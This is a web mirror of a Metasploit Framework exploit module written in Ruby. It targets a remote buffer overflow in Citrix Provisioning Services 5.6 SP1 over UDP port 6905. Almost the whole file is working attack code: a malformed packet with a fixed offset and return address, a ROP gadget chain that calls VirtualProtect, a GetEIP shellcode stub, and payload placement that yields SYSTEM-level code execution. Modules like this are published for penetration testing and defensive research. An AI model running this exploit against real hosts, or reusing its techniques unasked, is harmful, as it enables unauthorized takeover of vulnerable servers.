Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a remote buffer overflow in the Citrix Provisioning Services

18
          5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode

19
          0x40020002 (GetFooterRequest) to the 6905/UDP port. The module, which allows code execution

20
          under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2

21
          and Windows XP SP3.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author

26
          'juan vazquez' # Metasploit module

27
        ],

28
        'References' => [

29
          ['OSVDB', '75780'],

30
          ['BID', '49803'],

31
          ['URL', 'http://support.citrix.com/article/CTX130846']

32
        ],

33
        'DefaultOptions' => {

34
          'EXITFUNC' => 'process',

35
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

36
        },

37
        'Payload' => {

38
          'BadChars' => "\x00",

39
          'EncoderOptions' => { 'BufferRegister' => 'ECX' },

40
        },

41
        'Platform' => ['win'],

42
        'Targets' => [

43
          [

44
            'Citrix Provisioning Services 5.6 SP1',

45
            {

46
              'Offset' => 5596,

47
              'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe

48
            }

49
          ]

50
        ],

51
        'Privileged' => true,

52
        'DisclosureDate' => '2011-11-04', # CTX130846 creation date

53
        'DefaultTarget' => 0,

54
        'Notes' => {

55
          'Reliability' => UNKNOWN_RELIABILITY,

56
          'Stability' => UNKNOWN_STABILITY,

57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

58
        }

59
      )

60
    )

61


62
    register_options([Opt::RPORT(6905)])

63
  end

64


65
  def exploit

66
    packet = "\x02\x00\x02\x40" # DATA MSG

67
    packet << rand_text_alpha_upper(18)

68
    packet << "\x00\x00\x00\x00" # Length

69
    packet << rand_text_alpha_upper(target['Offset'])

70
    packet << [target.ret].pack('V')

71


72
    rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe

73


74
    rop_gadgets =

75
      [

76
        0x0045b141, # POP EAX; RETN streamprocess.exe

77
        0x1009a1bc, # VirtualProtect()

78
        0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe

79
        0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe

80
        0x004ad0cf, # POP EBP; RETN streamprocess.exe

81
        0x00455d9d, # PUSH ESP; RETN streamprocess.exe

82
        0x00497f5a, # POP EAX; RETN streamprocess.exe

83
        0xfffff9d0, # dwSize

84
        0x00447669, # NEG EAX; RETN streamprocess.exe

85
        0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe

86
        0x00426305, # POP ECX; RETN streamprocess.exe

87
        0x00671fb9, # lpflOldProtect

88
        0x004e41e6, # POP EDI; RETN streamprocess.exe

89
        0x0040f004, # RETN streamprocess.exe

90
        0x00495c05, # POP EAX; RETN streamprocess.exe

91
        0xffffffc0, # flNewProtect

92
        0x0042c79a, # NEG EAX; RETN streamprocess.exe

93
        0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe

94
        0x0045c1fa, # POP EAX; RETN streamprocess.exe

95
        0x90909090, # NOP

96
        0x00435bbe, # PUSHAD; RETN streamprocess.exe

97
      ].pack("V*")

98


99
    packet[398, rop_nop.length] = rop_nop

100
    packet[550, rop_gadgets.length] = rop_gadgets

101
    # Put payload address in ecx

102
    geteip = "\xeb\x03" # jmp short 0x5

103
    geteip << "\x59" # pop ecx

104
    geteip << "\xff\xd1" # call ecx

105
    geteip << "\xe8\xf8\xff\xff\xff" # call to "pop / call"

106
    packet[634, 10] = geteip

107
    packet[644, payload.encoded.length] = payload.encoded

108


109
    print_status("Trying target #{target.name}...")

110


111
    connect_udp

112
    udp_sock.put(packet)

113


114
    handler

115
    disconnect_udp

116
  end

117
end

118


119